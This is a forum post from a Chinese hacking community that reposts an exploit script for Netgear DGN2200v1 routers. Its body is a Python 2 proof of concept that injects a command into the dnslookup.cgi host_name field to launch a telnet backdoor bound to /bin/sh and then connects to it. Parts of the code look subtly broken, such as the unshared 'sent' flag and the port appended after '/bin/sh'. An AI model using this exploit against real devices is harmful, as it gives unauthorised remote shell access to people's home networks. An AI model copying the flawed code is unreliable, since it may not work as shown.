跳转到帖子

  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)

 分享
HACK1949

HACK1949
CHT漏洞数据库

推荐的帖子

HACK1949 Grand Master

HACK1949

发布于
发布于 
# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)
# Date: 02.07.2021
# Exploit Author: SivertPL
# Vendor Homepage: https://www.netgear.com/
# Version: All prior to v1.0.0.60

#!/usr/bin/python

"""
NETGEAR DGN2200v1 Unauthenticated Remote Command Execution

Author: SivertPL (kroppoloe@protonmail.ch)
Date: 02.07.2021
Status: Patched in some models
Version: All prior to v1.0.0.60
Impact: Critical 

CVE: No CVE number assigned
PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365


References: 
    1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
    2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1


The exploit script only works on UNIX-based systems.

This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past.
This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol.

"""

import sys
import requests
import os

target_ip = "192.168.0.1"
telnet_port = 666
sent = False

def main():
    if len(sys.argv) < 3:
        print "./dgn2200_pwn.py <router ip> <backdoor-port>"
        exit()

    target_ip = sys.argv[1]
    telnet_port = int(sys.argv[2])
    print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..."
    send_payload()
    print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..."
    print "[!] If it fails to connect it means the target is probably not vulnerable"
    spawn_shell()

def send_payload():
    try:
        requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true")
        sent = True
    except Exception:
        sent = False
        print "[-] Unknown error, target might not be vulnerable."

def spawn_shell():
    if sent:
        print "[+] Dropping a shell..."
        os.system("telnet " + target_ip + " " + telnet_port)
    else:
        exit()


if __name__ == "__main__":
    main()
链接帖子
意见的链接
分享到其他网站
 分享
转到主题列表

黑客攻防讨论组

黑客攻防讨论组

  
    You don't have permission to chat.

    • 最近浏览   0位会员

      • 没有会员查看此页面。

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • 创建新的...